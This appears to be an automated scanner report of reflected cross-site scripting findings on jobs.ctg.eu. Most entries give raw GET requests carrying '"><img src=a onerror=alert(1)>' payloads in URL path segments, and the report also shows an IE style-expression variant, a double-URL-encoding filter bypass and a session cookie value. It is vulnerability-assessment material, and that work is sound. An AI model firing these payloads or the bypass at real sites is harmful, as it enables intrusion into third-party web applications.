GET /sites/all1d572"><img%20src%3da%20onerror%3dalert(1)>4fdbbcc7f36/modules/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba was submitted in the REST URL parameter 3. This input was echoed as 3062d"><img src=a onerror=alert(1)>e573c228bba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules3062d"><img%20src%3da%20onerror%3dalert(1)>e573c228bba/views_accordion/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d15"style%3d"x%3aexpression(alert(1))"0106e014a15 was submitted in the REST URL parameter 3. This input was echoed as b7d15"style="x:expression(alert(1))"0106e014a15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea7"><img%20src%3da%20onerror%3dalert(1)>51ac2dadf1d was submitted in the REST URL parameter 4. This input was echoed as 21ea7"><img src=a onerror=alert(1)>51ac2dadf1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4 was submitted in the REST URL parameter 4. This input was echoed as d7030"><img src=a onerror=alert(1)>75e7ac5c8f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /sites/all/modules/views_accordiond7030"><img%20src%3da%20onerror%3dalert(1)>75e7ac5c8f4/views-accordion.js?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db was submitted in the REST URL parameter 5. This input was echoed as 18db4"><img src=a onerror=alert(1)>60208cc18db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/modules/views_accordion/views-accordion.js18db4"><img%20src%3da%20onerror%3dalert(1)>60208cc18db?L HTTP/1.1 Host: jobs.ctg.eu Proxy-Connection: keep-alive Referer: http://jobs.ctg.eu/we-promise User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22; __utmz=15424941.1303489680.1.1.utmcsr=ctg.com|utmccn=(referral)|utmcmd=referral|utmcct=/europe/we-are; __utma=15424941.1964271038.1303489680.1303489680.1303489680.1; __utmc=15424941; __utmb=15424941.2.10.1303489680; has_js=1
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114 was submitted in the REST URL parameter 1. This input was echoed as b0e6e"><img src=a onerror=alert(1)>a95dd8a114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sitesb0e6e"><img%20src%3da%20onerror%3dalert(1)>a95dd8a114/all/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81 was submitted in the REST URL parameter 2. This input was echoed as c1af7"><img src=a onerror=alert(1)>fc22992ed81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allc1af7"><img%20src%3da%20onerror%3dalert(1)>fc22992ed81/themes/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433 was submitted in the REST URL parameter 3. This input was echoed as 1f0ed"><img src=a onerror=alert(1)>710145aa433 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes1f0ed"><img%20src%3da%20onerror%3dalert(1)>710145aa433/threesixty/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae was submitted in the REST URL parameter 4. This input was echoed as 189af"><img src=a onerror=alert(1)>73e9826e1ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty189af"><img%20src%3da%20onerror%3dalert(1)>73e9826e1ae/css/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b was submitted in the REST URL parameter 5. This input was echoed as 6646f"><img src=a onerror=alert(1)>d04b41f719b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css6646f"><img%20src%3da%20onerror%3dalert(1)>d04b41f719b/content.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242 was submitted in the REST URL parameter 6. This input was echoed as bbdf4"><img src=a onerror=alert(1)>a2669574242 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/content.cssbbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0 was submitted in the REST URL parameter 1. This input was echoed as 9f83c"><img src=a onerror=alert(1)>e267de7cab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0/all/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086 was submitted in the REST URL parameter 2. This input was echoed as 6659a"><img src=a onerror=alert(1)>dbe43d36086 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82 was submitted in the REST URL parameter 3. This input was echoed as 4e923"><img src=a onerror=alert(1)>8929cc0ff82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20 was submitted in the REST URL parameter 4. This input was echoed as 66ee0"><img src=a onerror=alert(1)>a0e58f3bd20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff was submitted in the REST URL parameter 5. This input was echoed as 3d1d8"><img src=a onerror=alert(1)>7d59f35fcff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce was submitted in the REST URL parameter 6. This input was echoed as de084"><img src=a onerror=alert(1)>bada0a754ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/forms.cssde084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71 was submitted in the REST URL parameter 1. This input was echoed as 472d7"><img src=a onerror=alert(1)>d21d98c0b71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71/all/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb was submitted in the REST URL parameter 2. This input was echoed as e1609"><img src=a onerror=alert(1)>bb347cd22fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/alle1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80 was submitted in the REST URL parameter 3. This input was echoed as 40e93"><img src=a onerror=alert(1)>6c4bd4ba80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc was submitted in the REST URL parameter 4. This input was echoed as 4d35f"><img src=a onerror=alert(1)>7f3d9831ebc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547 was submitted in the REST URL parameter 5. This input was echoed as 4d36f"><img src=a onerror=alert(1)>c1408102547 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388 was submitted in the REST URL parameter 6. This input was echoed as d8cff"><img src=a onerror=alert(1)>6a1e3159388 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes/threesixty/css/reset.cssd8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1 was submitted in the REST URL parameter 1. This input was echoed as 115eb"><img src=a onerror=alert(1)>d9768e149d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites115eb"><img%20src%3da%20onerror%3dalert(1)>d9768e149d1/all/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe was submitted in the REST URL parameter 2. This input was echoed as fc85a"><img src=a onerror=alert(1)>dc393d248fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/allfc85a"><img%20src%3da%20onerror%3dalert(1)>dc393d248fe/themes/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b was submitted in the REST URL parameter 3. This input was echoed as 68189"><img src=a onerror=alert(1)>e75acd7573b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /sites/all/themes68189"><img%20src%3da%20onerror%3dalert(1)>e75acd7573b/threesixty/css/structure.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22
